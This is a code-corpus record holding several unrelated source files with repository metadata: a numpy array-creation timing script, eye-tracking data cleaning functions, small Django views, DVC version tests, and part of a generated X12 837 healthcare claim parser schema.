0
0
7
d3c9e0d4ce33dd4a138e4d57f14a8ffbeab8c45b
2,006
py
Python
dev/optimize/measure_np_create_arr.py
StefanHeng/test_ECG-Signal-Viewer
4fc1849aa5d8ff9bf18d3662bc405d7f20663b64
[ "MIT" ]
null
null
null
dev/optimize/measure_np_create_arr.py
StefanHeng/test_ECG-Signal-Viewer
4fc1849aa5d8ff9bf18d3662bc405d7f20663b64
[ "MIT" ]
null
null
null
dev/optimize/measure_np_create_arr.py
StefanHeng/test_ECG-Signal-Viewer
4fc1849aa5d8ff9bf18d3662bc405d7f20663b64
[ "MIT" ]
null
null
null
import numpy as np import timeit from optimize import optimize_time_conversion def measure_np_arange(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz})', setup=f'import numpy as np').repeat(10, num)) def measure_np_arange_f(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz}) / 2', setup=f'import numpy as np').repeat(10, num)) def measure_np_arange_us(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz}) * 500', setup=f'import numpy as np').repeat(10, num)) def measure_np_arange_us_f(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz}) * 500.0', setup=f'import numpy as np').repeat(10, num)) def measure_np_linspace(sz, num=3): return min(timeit.Timer(f'arr = np.linspace(0, {sz-1}, {sz})', setup=f'import numpy as np').repeat(10, num)) def measure_np_linspace_f(sz, num=3): return min(timeit.Timer(f'arr = np.linspace(0, {sz-1}, {sz}) / 2', setup=f'import numpy as np').repeat(10, num)) def measure_np_change_type(sz, num=3): return min(timeit.Timer(f'arr = np.linspace(0, {sz-1}, {sz}) * 500.0', setup=f'import numpy as np').repeat(10, num)) def measure_np_mult_v1(sz, num=3): return min(timeit.Timer(f'arr = (np.arange({sz}) * 10 ** 6 / 2000).astype(np.int64)', setup=f'import numpy as np').repeat(10, num)) def measure_np_mult_v2(sz, num=3): return min(timeit.Timer(f'arr = (np.arange({sz}) * 500.0).astype(np.int64)', setup=f'import numpy as np').repeat(10, num)) if __name__ == "__main__": size = optimize_time_conversion.size num_per_timeit = 10 # print(measure_np_arange(size, num_per_timeit)) # print(measure_np_arange_f(size, num_per_timeit)) # print(measure_np_arange_us(size, num_per_timeit)) # print(measure_np_arange_us_f(size, num_per_timeit)) # print(measure_np_linspace(size, num_per_timeit)) # print(measure_np_linspace_f(size, num_per_timeit)) print() print(measure_np_mult_v1(size, num_per_timeit)) print(measure_np_mult_v2(size, num_per_timeit))
34.586207
135
0.696411
356
2,006
3.702247
0.123596
0.116085
0.098634
0.113809
0.831563
0.831563
0.814871
0.792109
0.705615
0.647951
0
0.038796
0.139083
2,006
57
136
35.192982
0.724378
0.148056
0
0
0
0.037037
0.288824
0.026471
0
0
0
0
0
1
0.333333
false
0
0.444444
0.333333
1.111111
0.111111
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
10
31006e374b40cc105d0c73c45dce1942093b3d11
2,292
py
Python
sonaion_analysis/eyetracking/preprocessing_invalid.py
Sonaion/py-sonaion-analysis
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
[ "BSD-3-Clause" ]
1
2021-10-15T06:58:56.000Z
2021-10-15T06:58:56.000Z
sonaion_analysis/eyetracking/preprocessing_invalid.py
Sonaion/py-sonaion-analysis
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
[ "BSD-3-Clause" ]
null
null
null
sonaion_analysis/eyetracking/preprocessing_invalid.py
Sonaion/py-sonaion-analysis
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
[ "BSD-3-Clause" ]
null
null
null
def remove_invalid(eye_x, eye_y, pupil_diameter, eye_valid): """ A Function to remove invalid eye data, careful there is no machanism to synchronise left and right eye afterwards :param eye_x: an indexable datastructure with the x eye coordinates :param eye_y: an indexable datastructure with the y eye coordinates :param pupil_diameter: an indexable datastructure with the pupil diameter :param eye_valid: an indexable datastructure indicating if the eye is valid (1 if yes) :return a tuple (eye_x, eye_y, pupil_diameter, eye_valid) """ x = [] y = [] pupil = [] valid = [] for idx, value in enumerate(eye_valid): if value == 1: x.append(eye_x[idx]) y.append(eye_y[idx]) pupil.append(pupil_diameter[idx]) valid.append(1) return x, y, pupil, valid def replace_with_prev_invalid(eye_x, eye_y, pupil_diameter, eye_valid): """ A Function to remove invalid eye data, careful there is no machanism to synchronise left and right eye afterwards :param eye_x: an indexable datastructure with the x eye coordinates :param eye_y: an indexable datastructure with the y eye coordinates :param pupil_diameter: an indexable datastructure with the pupil diameter :param eye_valid: an indexable datastructure indicating if the eye is valid (1 if yes) :return a tuple (eye_x, eye_y, pupil_diameter, eye_valid) """ prev_x = None prev_y = None prev_pupil = None for idx, value in enumerate(eye_valid): if value == 1: prev_x = eye_x[idx] prev_y = eye_y[idx] prev_pupil = pupil_diameter[idx] break x = [] y = [] pupil = [] valid = [] for idx, value in enumerate(eye_valid): if value == 1: x.append(eye_x[idx]) y.append(eye_y[idx]) pupil.append(pupil_diameter[idx]) prev_x = eye_x[idx] prev_y = eye_y[idx] prev_pupil = pupil_diameter[idx] else: x.append(prev_x) y.append(prev_y) pupil.append(prev_pupil) valid.append(1) return x, y, pupil, valid
33.705882
117
0.608202
315
2,292
4.250794
0.149206
0.116505
0.143391
0.125467
0.917102
0.917102
0.917102
0.917102
0.872293
0.872293
0
0.004459
0.315009
2,292
67
118
34.208955
0.848408
0.447208
0
0.75
0
0
0
0
0
0
0
0
0
1
0.05
false
0
0
0
0.1
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
310953ae3e1f43870d07f4c3575d54ce975a32a9
212
py
Python
mysite/views.py
UrbanSwati/recipe24
8f69b4ef9b69c5e2f6741677820bf005be53e1c8
[ "MIT" ]
null
null
null
mysite/views.py
UrbanSwati/recipe24
8f69b4ef9b69c5e2f6741677820bf005be53e1c8
[ "MIT" ]
null
null
null
mysite/views.py
UrbanSwati/recipe24
8f69b4ef9b69c5e2f6741677820bf005be53e1c8
[ "MIT" ]
null
null
null
from django.http import HttpResponse from django.shortcuts import render def homepage(request): return render(request, 'homepage.html') def aboutpage(request): return render(request, 'aboutpage.html')
21.2
44
0.768868
26
212
6.269231
0.5
0.122699
0.233129
0.319018
0
0
0
0
0
0
0
0
0.136792
212
9
45
23.555556
0.89071
0
0
0
0
0
0.127962
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
8
31cc086b3ca9eb30e1a80d070401464f99d2a5c4
119
py
Python
parchments/core/__init__.py
idlelosthobo/parchment
99cebb8bed439c04be3e7e4f6869a4e3f85f6047
[ "MIT" ]
null
null
null
parchments/core/__init__.py
idlelosthobo/parchment
99cebb8bed439c04be3e7e4f6869a4e3f85f6047
[ "MIT" ]
4
2021-02-16T15:35:39.000Z
2021-04-09T19:19:35.000Z
parchments/core/__init__.py
idlelosthobo/parchments
99cebb8bed439c04be3e7e4f6869a4e3f85f6047
[ "MIT" ]
null
null
null
from parchments.core.row import Row from parchments.core.block import Block from parchments.core.core import period_key
39.666667
43
0.857143
19
119
5.315789
0.421053
0.415842
0.534653
0
0
0
0
0
0
0
0
0
0.092437
119
3
43
39.666667
0.935185
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
31d0d7e6648c93272f9738cd9b0afb9f4408d537
1,713
py
Python
tests/func/test_version.py
kaiogu/dvc
ffa8fe5888dbbb3d37b3874562f99fd77d4bbcb7
[ "Apache-2.0" ]
3
2020-01-31T05:33:14.000Z
2021-05-20T08:19:25.000Z
tests/func/test_version.py
kaiogu/dvc
ffa8fe5888dbbb3d37b3874562f99fd77d4bbcb7
[ "Apache-2.0" ]
null
null
null
tests/func/test_version.py
kaiogu/dvc
ffa8fe5888dbbb3d37b3874562f99fd77d4bbcb7
[ "Apache-2.0" ]
null
null
null
import os import re import pytest from dvc.command.version import psutil from dvc.main import main def test_info_in_repo(tmp_dir, dvc, caplog): # Create `.dvc/cache`, that is needed to check supported link types. os.mkdir(dvc.cache.local.cache_dir) assert main(["version"]) == 0 assert re.search(r"DVC version: \d+\.\d+\.\d+", caplog.text) assert re.search(r"Python version: \d\.\d\.\d", caplog.text) assert re.search(r"Platform: .*", caplog.text) assert re.search(r"Binary: (True|False)", caplog.text) assert re.search(r"Package: .*", caplog.text) assert re.search( r"(Cache: (.*link - (not )?supported(,\s)?){3})", caplog.text ) @pytest.mark.skipif(psutil is None, reason="No psutil.") def test_fs_info_in_repo(tmp_dir, dvc, caplog): os.mkdir(dvc.cache.local.cache_dir) assert main(["version"]) == 0 assert "Filesystem type (cache directory): " in caplog.text assert "Filesystem type (workspace): " in caplog.text def test_info_outside_of_repo(tmp_dir, caplog): assert main(["version"]) == 0 assert re.search(r"DVC version: \d+\.\d+\.\d+", caplog.text) assert re.search(r"Python version: \d\.\d\.\d", caplog.text) assert re.search(r"Platform: .*", caplog.text) assert re.search(r"Binary: (True|False)", caplog.text) assert re.search(r"Package: .*", caplog.text) assert not re.search(r"(Cache: (.*link - (not )?(,\s)?){3})", caplog.text) @pytest.mark.skipif(psutil is None, reason="No psutil.") def test_fs_info_outside_of_repo(tmp_dir, caplog): assert main(["version"]) == 0 assert "Filesystem type (cache directory): " not in caplog.text assert "Filesystem type (workspace): " in caplog.text
33.588235
78
0.666667
259
1,713
4.324324
0.220077
0.142857
0.096429
0.147321
0.855357
0.855357
0.817857
0.776786
0.776786
0.726786
0
0.004178
0.161705
1,713
50
79
34.26
0.775766
0.038529
0
0.571429
0
0
0.271733
0.013374
0
0
0
0
0.571429
1
0.114286
false
0
0.142857
0
0.257143
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
7
31d88c9885f0da56a1fe32565e2d86624381320a
950,807
py
Python
tigershark/parsers/M837_5010_X222_A1.py
CloudCray/TigerShark
e27f1e775652576743518d9f2dfd57266f0c541f
[ "BSD-3-Clause" ]
19
2016-05-09T01:30:37.000Z
2022-03-15T15:51:24.000Z
tigershark/parsers/M837_5010_X222_A1.py
CloudCray/TigerShark
e27f1e775652576743518d9f2dfd57266f0c541f
[ "BSD-3-Clause" ]
10
2016-04-11T14:55:54.000Z
2021-08-07T15:41:14.000Z
tigershark/parsers/M837_5010_X222_A1.py
CloudCray/TigerShark
e27f1e775652576743518d9f2dfd57266f0c541f
[ "BSD-3-Clause" ]
11
2015-10-15T16:12:39.000Z
2021-03-22T19:33:56.000Z
# # Generated by TigerShark.tools.convertPyX12 on 2021-05-10 10:26:14.167130 # from tigershark.X12.parse import Composite, Element, Loop, Message, Properties, Segment parsed_837_1000A = Loop( "1000A", Properties( desc="Submitter Name", looptype="", position="0200", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Submitter Name", position="0200", repeat="1", req_sit="R", syntax="P0809 C1110", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["41"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["46"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PER", 
Properties( desc="Submitter EDI Contact Information", position="0450", repeat="2", req_sit="R", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["ED", "EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["ED", "EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["ED", "EM", "EX", "FX", "TE"], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_1000B = Loop( "1000B", Properties( desc="Receiver Name", looptype="", position="0200", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Receiver Name", position="0200", repeat="1", req_sit="R", syntax="P0809 C1110", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["40"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", 
data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["46"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), ) parsed_837_HEADER = Loop( "HEADER", Properties( desc="Table 1 - Header", looptype="wrapper", position="0100", repeat="1", req_sit="R", ), Segment( "BHT", Properties( desc="Beginning of Hierarchical Transaction", position="0100", repeat="1", req_sit="R", syntax="", ), Element( "BHT01", Properties( desc="Hierarchical Structure Code", req_sit="R", data_type=("ID", "4", "4"), position=1, codes=["0019"], ), ), Element( "BHT02", Properties( desc="Transaction Set Purpose Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["00", "18"], ), ), Element( "BHT03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "BHT04", Properties( desc="Date", req_sit="R", data_type=("DT", "8", "8"), position=4, 
codes=[], ), ), Element( "BHT05", Properties( desc="Time", req_sit="R", data_type=("TM", "4", "8"), position=5, codes=[], ), ), Element( "BHT06", Properties( desc="Transaction Type Code", req_sit="R", data_type=("ID", "2", "2"), position=6, codes=["CH", "RP"], ), ), ), parsed_837_1000A, parsed_837_1000B, ) parsed_837_2010AA = Loop( "2010AA", Properties( desc="Billing Provider Name", looptype="", position="0150", repeat="1", req_sit="R", ), Segment( "NM1", Properties( desc="Billing Provider Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), 
Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Billing Provider Address", position="0250", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Billing Provider City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Billing Provider Tax Identification", position="0350", repeat="1", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EI", "SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( 
desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Billing Provider UPIN/License Information", position="0350", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Billing Provider Contact Information", position="0400", repeat="2", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["EM", "EX", "FX", "TE"], ), ), Element( 
"PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2010AB = Loop( "2010AB", Properties( desc="Pay-to Address Name", looptype="", position="0150", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Pay-to Address Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["87"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or 
Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Pay-to Address - ADDRESS", position="0250", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Pay-To Address City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2010AC = Loop( "2010AC", Properties( desc="Pay-To Plan Name", looptype="", position="0150", repeat="1", req_sit="S" ), Segment( "NM1", Properties( desc="Pay-To Plan Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PE"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], 
), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Pay-to Plan Address", position="0250", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Pay-To Plan City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", 
req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Pay-to Plan Secondary Identification", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Pay-To Plan Tax Identification Number", position="0350", repeat="1", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EI"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) 
